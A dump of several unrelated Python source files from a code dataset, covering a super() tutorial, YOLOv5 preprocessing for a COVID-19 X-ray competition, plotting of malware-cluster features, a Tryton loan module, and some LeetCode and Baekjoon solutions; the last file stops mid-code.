A\n# once class B overrides A's __init__, A's instance attributes would be lost; to avoid that problem we call super(), see below\nclass A:\n ram = \"I am in class A\"\n def __init__(self):\n self.one = \"i am in instant A\"\n self.two = \" you are in instant A\"\n self.three = \"special\"\n\n# override class A\nclass B(A):\n ram = \"I am in class B\"\n def __init__(self):\n super().__init__() # now 'special' from A's __init__ runs as well\n self.one = \"i am in instant B\" # if we comment out this line, 
the instance attribute from class A is printed instead\n self.two = \" you are in instant B\"\n\n# objects\na = A()\nb = B()\n\nprint(b.three) # prints 'special': it survives because super().__init__() ran A's __init__\nprint(b.one) # prints B's value, because B overrides the attribute of the same name\n","repo_name":"mayurgorane2311/pythontutorial","sub_path":"41.super() and overriding.py","file_name":"41.super() and overriding.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11117838929","text":"# Necessary/extra dependencies.\nimport os\nimport numpy as np\nimport pandas as pd\nimport yaml\nfrom tqdm import tqdm\nfrom shutil import copyfile\nfrom sklearn.model_selection import train_test_split, StratifiedKFold\nimport shutil\n\n# Get the raw bounding box by parsing the row value of the label column.\n# Ref: https://www.kaggle.com/yujiariyasu/plot-3positive-classes\ndef get_bbox(row):\n bboxes = []\n bbox = []\n for i, l in enumerate(row.label.split(' ')):\n if (i % 6 == 0) | (i % 6 == 1):\n continue\n bbox.append(float(l))\n if i % 6 == 5:\n bboxes.append(bbox)\n bbox = [] \n \n return bboxes\n\n# Scale the bounding boxes according to the size of the resized image. \ndef scale_bbox(row, bboxes):\n # Get scaling factor\n scale_x = IMG_SIZE/row.dim1\n scale_y = IMG_SIZE/row.dim0\n \n scaled_bboxes = []\n for bbox in bboxes:\n x = int(np.round(bbox[0]*scale_x, 4))\n y = int(np.round(bbox[1]*scale_y, 4))\n x1 = int(np.round(bbox[2]*(scale_x), 4))\n y1 = int(np.round(bbox[3]*scale_y, 4))\n\n scaled_bboxes.append([x, y, x1, y1]) # xmin, ymin, xmax, ymax\n \n return scaled_bboxes\n\n# Convert the bounding boxes into YOLO format.\ndef get_yolo_format_bbox(img_w, img_h, bboxes):\n yolo_boxes = []\n for bbox in bboxes:\n w = bbox[2] - bbox[0] # xmax - xmin\n h = bbox[3] - bbox[1] # ymax - ymin\n xc = bbox[0] + int(np.round(w/2)) # xmin + width/2\n yc = bbox[1] + int(np.round(h/2)) # ymin + height/2\n \n yolo_boxes.append([xc/img_w, yc/img_h, w/img_w, h/img_h]) # x_center y_center width height\n \n return yolo_boxes\n\n\ndef write_bbox_files(tmp_df, fold_num, split):\n path = f'./input/dataset_folds_{fold_num}/labels/{split}'\n for i in tqdm(range(len(tmp_df))):\n row = tmp_df.loc[i]\n # Get image id\n img_id = row.id\n # Get image-level label\n label = row.image_level\n\n file_name = f'{path}/{img_id}.txt'\n\n if label==1:\n # Get bboxes\n bboxes = get_bbox(row)\n # Scale bounding boxes\n scale_bboxes = scale_bbox(row, bboxes)\n # Format for YOLOv5\n yolo_bboxes = get_yolo_format_bbox(IMG_SIZE, IMG_SIZE, scale_bboxes)\n\n with open(file_name, 'w') as f:\n for bbox in yolo_bboxes:\n bbox = [1]+bbox\n bbox = [str(i) for i in bbox]\n bbox = ' '.join(bbox)\n f.write(bbox)\n f.write('\\n')\n\n\ndef preprocess_image_level_df(image_level_path='./input/train_image_level.csv'):\n df = pd.read_csv(image_level_path)\n\n # Modify values in the id column\n df['id'] = df.apply(lambda row: row.id.split('_')[0], axis=1)\n # Add absolute path\n # df['path'] = df.apply(lambda row: f'{TRAIN_PATH}/{row.id}.png', axis=1)\n # Get image level labels\n # df['image_level'] = df.apply(lambda row: row.label.split(' ')[0], axis=1)\n\n def _image_level(row):\n label = row.label.split(' ')[0]\n if label == 'opacity': return 1\n else: return 0\n\n df['image_level'] = df.apply(lambda row: _image_level(row), axis=1)\n print('Done Preprocess Image Level Data')\n return df\n\n\ndef preprocess_meta_df():\n meta_df = pd.read_csv('./input/meta.csv') #siim-covid19-resized-to-256px-png\n train_meta_df = 
meta_df.loc[meta_df.split == 'train']\n train_meta_df = train_meta_df.drop('split', axis=1)\n train_meta_df.columns = ['id', 'dim0', 'dim1']\n print('Done Preprocess Meta Data')\n return train_meta_df\n\n\ndef preprocess_study_level(image_level_df):\n label_df = pd.read_csv('./input/train_study_level.csv')\n\n # Modify values in the id column\n label_df['id'] = label_df.apply(lambda row: row.id.split('_')[0], axis=1)\n # Rename the column id with StudyInstanceUID\n label_df.columns = ['StudyInstanceUID', 'Negative for Pneumonia', 'Typical Appearance', 'Indeterminate Appearance', 'Atypical Appearance']\n\n # Label encode study-level labels\n labels = label_df[['Negative for Pneumonia','Typical Appearance','Indeterminate Appearance','Atypical Appearance']].values\n labels = np.argmax(labels, axis=1)\n label_df['study_level'] = labels\n\n # ORIGINAL DIMENSION\n\n # Load meta.csv file\n train_meta_df = preprocess_meta_df()\n # Merge image-level and study-level\n image_study_total = image_level_df.merge(label_df, on='StudyInstanceUID',how=\"left\")\n # Merge with meta_df\n image_study_total = image_study_total.merge(train_meta_df, on='id',how=\"left\")\n\n # Write as csv file\n image_study_total.to_csv('./input/_image_study_total.csv', index=False)\n print(f'Image Study Total csv file saved to: ./input/_image_study_total.csv')\n return image_study_total\n\n\ndef make_image_level_fold(img_path='./input/siim-covid19-resized-to-256px-png/train/', n_fold=5, seed=42):\n # /Users/rick/Dropbox/python_projects/data_science/Kaggle/siim_covid19/input/siimcovid19-512-img-png-600-study-png/image\n df = pd.read_csv('./input/_image_study_total.csv')\n df['path'] = df.apply(lambda row: f'{img_path}/{row.id}_image.png', axis=1)\n \n # Group by Study Ids and remove images that are \"assumed\" to be mislabeled\n for grp_df in df.groupby('StudyInstanceUID'):\n grp_id, grp_df = grp_df[0], grp_df[1]\n if len(grp_df) == 1:\n pass\n else:\n for i in range(len(grp_df)):\n row = grp_df.loc[grp_df.index.values[i]]\n if row.study_level > 0 and row.boxes is np.nan:\n df = df.drop(grp_df.index.values[i])\n \n print('total number of images: ', len(df))\n \n # Create train and validation split.\n df = df.drop('boxes', axis=1).reset_index()\n Fold = StratifiedKFold(n_splits=n_fold, shuffle=True, random_state=seed)\n for n, (train_index, val_index) in enumerate(Fold.split(df, df['image_level'])):\n df.loc[val_index, 'fold'] = int(n)\n df['fold'] = df['fold'].astype(int)\n\n df.to_csv('./input/train_fold.csv', index=False)\n print(f'Image Level Fold csv file saved to: ./input/train_fold.csv')\n return df\n\n\ndef create_yaml_file(n_fold=5):\n for fold in range(n_fold):\n data_yaml = dict(\n train = f'./input/dataset_folds_{fold}/images/train',\n val = f'./input/dataset_folds_{fold}/images/valid',\n nc = 2,\n names = ['none', 'opacity']\n )\n\n # Note that I am creating the file in the yolov5/data/ directory.\n with open(f'./src/models/yolov5/data/data_fold_{fold}.yaml', 'w') as outfile:\n yaml.dump(data_yaml, outfile, default_flow_style=True)\n print(f'config yaml file saved to: ./src/models/yolov5/data/data_fold_{fold}.yaml')\n\n\ndef prepare_images(df, n_fold=5):\n # Remove existing dirs\n for fold in range(n_fold):\n print(f'Preparing Images for Fold {fold}')\n # Prepare train and valid df\n train_df = df.loc[df.fold != fold].reset_index(drop=True)\n valid_df = df.loc[df.fold == fold].reset_index(drop=True)\n \n try:\n shutil.rmtree(f'./input/dataset_folds_{fold}/images')\n 
shutil.rmtree(f'./input/dataset_folds_{fold}/labels')\n print(f'Deleted: ./input/dataset_folds_{fold}/images')\n print(f'Deleted: ./input/dataset_folds_{fold}/labels')\n except:\n print('No dirs')\n\n # Make new dirs\n os.makedirs(f'./input/dataset_folds_{fold}/images/train', exist_ok=True)\n os.makedirs(f'./input/dataset_folds_{fold}/images/valid', exist_ok=True)\n os.makedirs(f'./input/dataset_folds_{fold}/labels/train', exist_ok=True)\n os.makedirs(f'./input/dataset_folds_{fold}/labels/valid', exist_ok=True)\n print(f'Made Directory: ./input/dataset_folds_{fold}/images/train')\n print(f'Made Directory: ./input/dataset_folds_{fold}/images/valid')\n print(f'Made Directory: ./input/dataset_folds_{fold}/labels/train')\n print(f'Made Directory: ./input/dataset_folds_{fold}/labels/valid')\n\n # Move the images to relevant split folder.\n for i in tqdm(range(len(train_df))):\n row = train_df.loc[i]\n copyfile(row.path, f'./input/dataset_folds_{fold}/images/train/{row.id}.png')\n \n for i in tqdm(range(len(valid_df))):\n row = valid_df.loc[i]\n copyfile(row.path, f'./input/dataset_folds_{fold}/images/valid/{row.id}.png')\n\n print('Done Prepare Images')\n\n\nif __name__ == '__main__':\n # TRAIN_PATH = 'input/siim-covid19-resized-to-256px-jpg/train/'\n TRAIN_PATH = 'input/siimcovid19-512-img-png-600-study-png/image' #'./input/train/'\n\n n_fold = 5\n IMG_SIZE = 512 #256\n seed=42\n\n if n_fold == 5:\n image_level_df = preprocess_image_level_df()\n image_study_total = preprocess_study_level(image_level_df)\n image_level_fold_df = make_image_level_fold(img_path=TRAIN_PATH, n_fold=n_fold, seed=seed)\n prepare_images(image_level_fold_df, n_fold=n_fold)\n create_yaml_file(n_fold=n_fold)\n\n # Prepare the txt files for bounding box\n for fold in range(n_fold):\n # Prepare train and valid df\n train_df = image_level_fold_df.loc[image_level_fold_df.fold != fold].reset_index(drop=True)\n valid_df = image_level_fold_df.loc[image_level_fold_df.fold == fold].reset_index(drop=True)\n \n # prepare label for train\n write_bbox_files(train_df, fold, 'train')\n # prepare label for valid\n write_bbox_files(valid_df, fold, 'valid')\n\n elif n_fold == 1:\n if not os.path.exists('./input/train_v1.csv') and n_fold ==1:\n # Load image level csv file\n df = preprocess_image_level_df()\n # Load meta.csv file\n # Original dimensions are required to scale the bounding box coordinates appropriately.\n train_meta_df = preprocess_meta_df()\n\n image_level_df = df.merge(train_meta_df, on='id',how=\"left\")\n image_level_df.to_csv('./input/train_v1.csv', index=False)\n\n df = pd.read_csv('./input/train_v1.csv')\n # Create train and validation split.\n train_df, valid_df = train_test_split(df, test_size=0.2, random_state=42, stratify=df.image_level.values)\n\n train_df.loc[:, 'split'] = 'train'\n valid_df.loc[:, 'split'] = 'valid'\n\n train_df.loc[:, 'fold'] = 1\n valid_df.loc[:, 'fold'] = 0\n\n df = pd.concat([train_df, valid_df]).reset_index(drop=True)\n df.to_csv('./input/train_image_v1_fold.csv', index=False)\n\n\n print(f'Size of dataset: {len(df)}, training images: {len(train_df)}. 
validation images: {len(valid_df)}')\n\n\n os.makedirs('./input/tmp/covid/images/train', exist_ok=True)\n os.makedirs('./input/tmp/covid/images/valid', exist_ok=True)\n\n os.makedirs('./input/tmp/covid/labels/train', exist_ok=True)\n os.makedirs('./input/tmp/covid/labels/valid', exist_ok=True)\n\n\n # Move the images to relevant split folder.\n for i in tqdm(range(len(df))):\n row = df.loc[i]\n if row.split == 'train':\n copyfile(row.path, f'./input/tmp/covid/images/train/{row.id}.jpg')\n else:\n copyfile(row.path, f'./input/tmp/covid/images/valid/{row.id}.jpg')\n\n\n # ## 🍜 Create `.YAML` file\n # \n # The `data.yaml`, is the dataset configuration file that defines \n # \n # 1. an \"optional\" download command/URL for auto-downloading, \n # 2. a path to a directory of training images (or path to a *.txt file with a list of training images), \n # 3. a path to a directory of validation images (or path to a *.txt file with a list of validation images), \n # 4. the number of classes, \n # 5. a list of class names.\n # \n # > 📍 Important: In this competition, each image can either belong to `opacity` or `none` image-level labels. That's why I have used the number of classes, `nc` to be 2. YOLOv5 automatically handles the images without any bounding box coordinates. \n # \n # > 📍 Note: The `data.yaml` is created in the `yolov5/data` directory as required. \n # Create .yaml file \n data_yaml = dict(\n train = './input/tmp/covid/images/train',\n val = './input/tmp/covid/images/valid',\n # nc = 2,\n # names = ['none', 'opacity']\n nc = 4,\n names = ['Negative for Pneumonia', 'Typical Appearance',\n 'Indeterminate Appearance', 'Atypical Appearance']\n )\n\n # Note that I am creating the file in the yolov5/data/ directory.\n with open('../src/yolov5/data/data_v2.yaml', 'w') as outfile:\n yaml.dump(data_yaml, outfile, default_flow_style=True)\n \n\n # ## 🍮 Prepare Bounding Box Coordinated for YOLOv5\n # \n # For every image with **bounding box(es)** a `.txt` file with the same name as the image will be created in the format shown below:\n # \n # * One row per object.
\n # * Each row is in `class x_center y_center width height` format.
\n # * Box coordinates must be in normalized xywh format (from 0 to 1). If the boxes are in pixels, divide `x_center` and `width` by image width, and `y_center` and `height` by image height.
\n # * Class numbers are zero-indexed (start from 0).
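\n # For example, a single `opacity` box covering the left half of a 256x256 image would be written as the line `1 0.25 0.5 0.5 1.0` (class x_center y_center width height).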
        \n # \n # > 📍 Note: We don't have to remove the images without bounding boxes from the training or validation sets. \n\n # Prepare the txt files for bounding box\n for i in tqdm(range(len(df))):\n row = df.loc[i]\n # Get image id\n img_id = row.id\n # Get split\n split = row.split\n # Get image-level label\n label = row.image_level\n \n if row.split=='train':\n file_name = f'./input/tmp/covid/labels/train/{row.id}.txt'\n else:\n file_name = f'./input/tmp/covid/labels/valid/{row.id}.txt'\n \n \n if label=='opacity':\n # Get bboxes\n bboxes = get_bbox(row)\n # Scale bounding boxes\n scale_bboxes = scale_bbox(row, bboxes)\n # Format for YOLOv5\n yolo_bboxes = get_yolo_format_bbox(IMG_SIZE, IMG_SIZE, scale_bboxes)\n \n with open(file_name, 'w') as f:\n for bbox in yolo_bboxes:\n bbox = [1]+bbox\n bbox = [str(i) for i in bbox]\n bbox = ' '.join(bbox)\n f.write(bbox)\n f.write('\\n')","repo_name":"R1ck29/kaggle-siim-fisabio-rsna-covid-19-detection","sub_path":"src/preprocess/detection/preprocess_yolov5.py","file_name":"preprocess_yolov5.py","file_ext":"py","file_size_in_byte":14834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74119810451","text":"from collections import defaultdict\nfrom utilities import constants\nimport plotly.graph_objs as go\nimport plotly.offline as ply\nfrom utilities import utils\nfrom plotly import tools\nimport numpy as np\nimport json\nimport os\n\n\ndef plot_cluster_features(config, clustering, names=None, av=False):\n \"\"\"\n Plot the histograms of the features of the clusters.\n For each cluster, order the features and plot the histograms, then move down.\n\n :param config: application configuration dictionary\n :param clustering: dictionary mapping uuids to cluster ids\n :param names: family labels\n :param av: flag, if set the method is plotting AV labeling\n :return:\n \"\"\"\n\n dir_store = config['dir_store']\n words = json.load(open(os.path.join(constants.dir_d, constants.json_words), 'r'))\n word_list = sorted(list(words.keys()))\n\n print('Plotting clustering features')\n\n reverse_clustering = defaultdict(list)\n for uuid, cluster in clustering.items():\n reverse_clustering[cluster].append(uuid)\n\n i = 1\n n_clust = len(reverse_clustering)\n base = np.arange(len(word_list))\n\n axis_dict = dict(\n autorange=True,\n showgrid=False,\n zeroline=False,\n showline=False,\n autotick=True,\n ticks='',\n showticklabels=False\n )\n fig = tools.make_subplots(rows=n_clust, cols=1)\n\n for cluster in sorted(reverse_clustering):\n cluster_features = np.zeros(len(word_list))\n\n uuids = reverse_clustering[cluster]\n for uuid in uuids:\n tfidfs = json.load(open(os.path.join(dir_store, uuid), 'r'))\n\n for j in range(len(word_list)):\n cluster_features[j] += tfidfs.get(word_list[j], 0)\n\n if names:\n name = names[i - 1]\n else:\n name = str(i)\n\n trace = go.Scatter(x=base, y=cluster_features, name=name, text=word_list)\n fig.append_trace(trace, i, 1)\n fig['layout']['xaxis{}'.format(i)].update(axis_dict)\n fig['layout']['yaxis{}'.format(i)].update(axis_dict)\n\n i += 1\n\n plot_name = os.path.join(constants.dir_d, constants.dir_vis, 'features_{}'.format(len(clustering)))\n plot_name = plot_name + '_AV' if av else plot_name\n ply.plot(fig, filename=plot_name)\n\n\ndef plot_av_features(uuids, config):\n \"\"\"\n Uses the cluster feature plotting method to show the features of the clusters provided by AV labeling.\n\n :param uuids: list of uuids\n :param config: configuration dictionary\n :return:\n 
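None; the figure itself is written out by plot_cluster_features (via plotly offline)\n 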
\"\"\"\n\n labels = utils.get_base_labels_uuids(uuids)\n pseudo_clustering = dict(zip(uuids, labels))\n families = utils.get_index_labels()\n families = sorted(set([families[label] for label in labels]))\n\n plot_cluster_features(config, pseudo_clustering, families)\n","repo_name":"ClonedOne/malwords","sub_path":"visualization/vis_cluster.py","file_name":"vis_cluster.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"24496871283","text":"import datetime\nfrom trytond.model import Workflow\nfrom trytond.model import (\n ModelView, ModelSQL, fields)\nfrom trytond.pool import Pool\nfrom trytond.pyson import Eval\nfrom trytond.transaction import Transaction\n\n__all__ = ['ComputerLoan', 'LoanCancelreason', 'loanLine']\n\n\nclass ComputerLoan(Workflow, ModelSQL, ModelView):\n 'Computer Loan'\n __name__ = 'computer.loan'\n\n salary_code = fields.Char('Salary Code',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n employee = fields.Many2One('company.employee', 'Name of Applicant',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n designation = fields.Many2One(\"employee.designation\",\n \"Applicant's Designation\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n department = fields.Many2One('company.department', 'Department')\n pay_in_band = fields.Char('Pay in the Pay Band')\n price = fields.Float('Price of Personal Computer')\n amount_required = fields.Float(\"Amount Required\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'], required=True)\n date_of_retirement = fields.Date('Date of Retirement')\n dob = fields.Date(\"Date of Birth\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n installment_no = fields.Integer(\"Number of installment\")\n purpose = fields.Selection([\n ('', 'None'),\n ('yes', 'Yes'),\n ('no', 'No'),\n ], string='Purpose',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'], required=True)\n drawal_date = fields.Date('Date of drawal of advance',\n states={\n 'invisible': ~Eval('purpose').in_(['yes']),\n 'required': Eval('purpose').in_(['yes']),\n }, depends=['purpose'])\n interest = fields.Float('Interest',\n states={\n 'invisible': ~Eval('purpose').in_(['yes']),\n 'required': Eval('purpose').in_(['yes']),\n }, depends=['purpose'])\n basic_pay = fields.Float(\"Basic Pay\",\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n }, depends=['state'])\n cancel_reason = fields.Many2One('loan.cancel.reason', 'Cancel Reason',\n states={\n 'invisible': ~Eval(\n 'state').in_(['forwarded_to_ao', 'cancel']),\n 'readonly': ~Eval('state').in_(['forwarded_to_ao']),\n }, depends=['state'],)\n payout = fields.Float('Payout',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n 'invisible': ~Eval('refund').in_(['refundable']),\n }, depends=['state'])\n pending = fields.Float('Pending',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n 'invisible': ~Eval('refund').in_(['refundable']),\n }, depends=['state'])\n reschedule = fields.Float('Reschedule',\n states={\n 'readonly': ~Eval('state').in_(['draft']),\n 'invisible': ~Eval('refund').in_(['refundable']),\n }, depends=['state'])\n state = fields.Selection(\n [\n ('draft', 'Draft'),\n ('forwarded_to_jo', 'Forwarded to JO'),\n ('forwarded_to_ao', 'Forwarded to AO'),\n ('approve', 'Approved'),\n ('cancel', 'Cancel')\n ], 'Status', 
readonly=True\n )\n\n @classmethod\n def __setup__(cls):\n super().__setup__()\n cls._transitions |= set((\n ('draft', 'forwarded_to_jo'),\n ('forwarded_to_jo', 'forwarded_to_ao'),\n ('forwarded_to_ao', 'approve'),\n ('forwarded_to_ao', 'cancel'),\n ))\n cls._buttons.update({\n 'submitted_to_ao': {\n 'invisible': ~Eval('state').in_(\n ['draft']),\n 'depends': ['state'],\n },\n 'forward_to_jo': {\n 'invisible': ~Eval('state').in_(\n ['forwarded_to_jo']),\n 'depends': ['state'],\n },\n 'forward_to_ao': {\n 'invisible': ~Eval('state').in_(\n ['forwarded_to_ao']),\n 'depends': ['state'],\n },\n 'cancel': {\n 'invisible': ~Eval('state').in_(\n ['forwarded_to_ao']),\n 'depends': ['state'],\n },\n })\n\n @staticmethod\n def default_state():\n return 'draft'\n\n @classmethod\n @ModelView.button\n @Workflow.transition('forwarded_to_jo')\n def submitted_to_ao(cls, records):\n cls.loan_installment(records)\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('forwarded_to_ao')\n def forward_to_jo(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('approve')\n def forward_to_ao(cls, records):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('cancel')\n def cancel(cls, records):\n for record in records:\n if not record.cancel_reason:\n cls.raise_user_error('Please fill the Cancel reason')\n pass\n\n @staticmethod\n def default_employee():\n pool = Pool()\n User = pool.get('res.user')\n user = User(Transaction().user)\n employee = user.employee\n return employee.id if employee else None\n\n @fields.depends('employee')\n def on_change_employee(self, name=None):\n self.salary_code = self.employee.salary_code\n self.designation = self.employee.designation\n self.department = self.employee.department\n self.pay_in_band = self.employee.pay_in_band\n pool = Pool()\n hrcontract = pool.get('hr.contract')\n contracts = hrcontract.search([\n ('employee', '=', self.employee),\n ('active', '<=', True)\n ])\n for contract in contracts:\n self.basic_pay = contract.basic\n\n @classmethod\n def write(cls, *args):\n actions = iter(args)\n for mechanisms, values in zip(actions, actions):\n if 'installment_no' in values.keys():\n cls.change_loan_installment(mechanisms, values)\n super(ComputerLoan, cls).write(*args)\n\n @classmethod\n def change_loan_installment(cls, records, values):\n cursor = Transaction().connection.cursor()\n LoanLine = Pool().get('loan.line')\n for loan in records:\n cursor.execute('SELECT sum(amount) FROM loan_line WHERE loan=%s \\\n AND status = %s', (loan.id, 'done'))\n total_amount = cursor.fetchone()\n if total_amount[0]:\n reschedule = loan.amount_required - total_amount[0]\n cls.write(records, {'payout': total_amount[0],\n 'reschedule': reschedule})\n amount = (reschedule/values['installment_no'])\n else:\n amount = (loan.amount_required/values['installment_no'])\n cursor.execute('delete FROM loan_line WHERE loan=%s \\\n AND status != %s', (loan.id, 'done'))\n count = 0\n for line in range(1, int(values['installment_no'])+1):\n mydate = datetime.datetime.now().month\n month = mydate - 1\n if month+line > 12:\n count +=1\n if count > 12:\n count = 1\n months = datetime.date(1900, count, 1).strftime('%B')\n else:\n months = datetime.date(1900, month+line, 1).strftime('%B')\n vals = {\n 'month': months,\n 'amount': amount,\n 'status': 'pending',\n 'loan': loan.id\n }\n line = LoanLine.create([vals])\n\n @classmethod\n def loan_installment(cls, records):\n count = 0\n LoanLine = Pool().get('loan.line')\n for loan in records:\n amount 
= (loan.amount_required/loan.installment_no)\n for line in range(1, int(loan.installment_no)+1):\n mydate = datetime.datetime.now().month\n month = mydate - 1\n if month + line > 12:\n count += 1\n if count > 12:\n count = 1\n months = datetime.date(1900, count, 1).strftime('%B')\n else:\n months = datetime.date(1900, month+line, 1).strftime('%B')\n vals = {\n 'month': months,\n 'amount': amount,\n 'status': 'pending',\n 'loan': loan.id\n }\n line = LoanLine.create([vals])\n\n\nclass LoanCancelreason(ModelSQL, ModelView):\n 'Loan Cancel Reason'\n\n __name__ = 'loan.cancel.reason'\n _rec_name = 'name'\n\n name = fields.Char(\"Cancel Reason\")\n\n\nclass loanLine(ModelSQL, ModelView):\n 'loan Lines'\n\n __name__ = 'loan.line'\n _rec_name = 'month'\n\n month = fields.Char(\"Month\")\n amount = fields.Float(\"Amount\")\n status = fields.Selection([\n ('pending', 'Pending'),\n ('done', 'Done'),\n ], string='Status',)\n loan = fields.Many2One(\"computer.loan\", \"Loan\")\n\n @staticmethod\n def default_status():\n return 'pending'\n","repo_name":"kakamble-aiims/work","sub_path":"src/modules/customised/payroll/loan/loan.py","file_name":"loan.py","file_ext":"py","file_size_in_byte":9520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26846572973","text":"import os\n\nimport h5py\nimport numpy as np\n\nfrom config import cfg\nfrom lib.dataset.utils import Splits\n\n\ndef save_feats():\n for split in [Splits.TRAIN,\n Splits.TEST,\n ]:\n\n pkls_dir = cfg.program.precomputed_data_dir_format % (cfg.model.rcnn_arch, split.value)\n os.makedirs(pkls_dir)\n precomputed_feats_fn = cfg.program.precomputed_feats_file_format % (cfg.model.rcnn_arch, split.value)\n feat_file = h5py.File(precomputed_feats_fn, 'r')\n try:\n box_feats = feat_file['box_feats']\n masks = feat_file['masks']\n chunk_size = 1000\n num_boxes = box_feats.shape[0]\n for i in range(np.ceil(num_boxes / chunk_size).astype(np.int)):\n start = i * chunk_size\n end = min((i + 1) * chunk_size, num_boxes)\n print(start, '-', end - 1)\n box_feats_chunk = box_feats[start:end, :]\n masks_chunk = masks[start:end, :]\n with open(os.path.join(pkls_dir, 'box_%d-%d.pkl' % (start, end - 1)), 'wb') as f:\n np.savez(f, box_feats=box_feats_chunk, masks=masks_chunk)\n finally:\n feat_file.close()\n print('%s feat file closed.' 
% split.value)\n\n\nif __name__ == '__main__':\n save_feats()\n","repo_name":"alessiosarullo/KBVRD","sub_path":"dump/h5_to_pkls.py","file_name":"h5_to_pkls.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26534957989","text":"class Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n dp = [[] for _ in range(0, target+1)]\n dp[0].append([])\n for n in candidates:\n for t in range(target, n-1, -1):\n if n <= t:\n for j in dp[t-n]:\n if j + [n] not in dp[t]:\n dp[t].append(j + [n])\n return dp[target]","repo_name":"cli3338198/leetcode","sub_path":"0040-combination-sum-ii/0040-combination-sum-ii.py","file_name":"0040-combination-sum-ii.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22505824740","text":"# https://www.acmicpc.net/problem/2108\n\n\"\"\"\nWrite one function for each statistic, then print the results in order.\n\nArithmetic mean: the sum of the N numbers divided by N\nMedian: the middle value when the N numbers are arranged in increasing order\nMode: the value that appears most often among the N numbers\nRange: the difference between the maximum and the minimum of the N numbers\n\"\"\"\n\nimport sys \nfrom collections import Counter\n\nt = int(sys.stdin.readline())\n\nnumbers = [int(sys.stdin.readline()) for _ in range(t)]\n \ndef mean(nums):\n return round(sum(nums)/len(nums))\n\ndef median(nums):\n nums.sort()\n mid = nums[len(nums)//2] # the number of elements in nums is odd\n \n return mid\n\ndef mode(nums):\n mode_dict = Counter(nums)\n # sort by count (descending), then by value, so ties yield the second-smallest mode\n modes = sorted(mode_dict.most_common(), key=lambda x: (-x[1], x[0])) \n \n if len(nums) > 1 : \n if modes[0][1] == modes[1][1]:\n mod = modes[1][0]\n else : \n mod = modes[0][0]\n else : \n mod = modes[0][0]\n\n return mod\n \ndef range(nums):\n return max(nums) - min(nums)\n\nprint(mean(numbers))\nprint(median(numbers))\nprint(mode(numbers))\nprint(range(numbers))\n","repo_name":"sophryu99/algorithm","sub_path":"BaekJoon/2108_통계학.py","file_name":"2108_통계학.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"2914858709","text":"import json\n\n\ndef paginate_dataset(dataset, page, page_size):\n \"\"\"Paginate a dataset in a deletion-resilient manner.\n\n Args:\n dataset: The dataset to paginate.\n page: The current page number.\n page_size: The number of items per page.\n\n Returns:\n A dictionary containing the paginated dataset and hypermedia metadata.\n \"\"\"\n\n tombstones = []\n\n for item in dataset:\n if item['deleted']:\n tombstones.append(item['id'])\n\n paginated_dataset = [\n item for item in dataset if item['id'] not in tombstones\n ][(page - 1) * page_size:page * page_size]\n\n metadata = {\n \"page\": page,\n \"page_size\": page_size,\n \"total_pages\": (len(dataset) - len(tombstones) + page_size - 1) // page_size,\n }\n\n if page > 1:\n metadata[\"previous_page\"] = page - 1\n\n if page < metadata[\"total_pages\"]:\n metadata[\"next_page\"] = page + 1\n\n return {\"data\": paginated_dataset, \"meta\": metadata}\n\n\ndef main():\n dataset = [\n {'id': 1, 'deleted': True},\n {'id': 2, 'deleted': True},\n {'id': 3, 'deleted': True},\n {'id': 4, 'deleted': True},\n {'id': 5, 'deleted': False},\n ]\n\n paginated_dataset = paginate_dataset(dataset, 1, 2)\n\n print(json.dumps(paginated_dataset, indent=2))\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"AishaKhalfan/alx-backend","sub_path":"0x00-pagination/deletion-resilient.py","file_name":"deletion-resilient.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4065966272","text":"'''\n188 Best Time to Buy and Sell Stock IV\n\nYou are given an integer array prices where prices[i] is the price of a given stock on the ith day, and an integer k.\n\nFind the maximum profit you can achieve. You may complete at most k transactions.\n\nNote: You may not engage in multiple transactions simultaneously (i.e., you must sell the stock before you buy again).\n\n \n\nExample 1:\n\nInput: k = 2, prices = [2,4,1]\nOutput: 2\nExplanation: Buy on day 1 (price = 2) and sell on day 2 (price = 4), profit = 4-2 = 2.\nExample 2:\n\nInput: k = 2, prices = [3,2,6,5,0,3]\nOutput: 7\nExplanation: Buy on day 2 (price = 2) and sell on day 3 (price = 6), profit = 6-2 = 4. Then buy on day 5 (price = 0) and sell on day 6 (price = 3), profit = 3-0 = 3.\n \n\nConstraints:\n\n1 <= k <= 100\n1 <= prices.length <= 1000\n0 <= prices[i] <= 1000\n\n'''\n\nclass Solution:\n def maxProfit(self, k: int, prices: List[int]) -> int:\n if k >= len(prices) // 2:\n sell = 0\n hold = -math.inf\n\n for price in prices:\n sell = max(sell, hold + price)\n hold = max(hold, sell - price)\n\n return sell\n\n sell = [0] * (k + 1)\n hold = 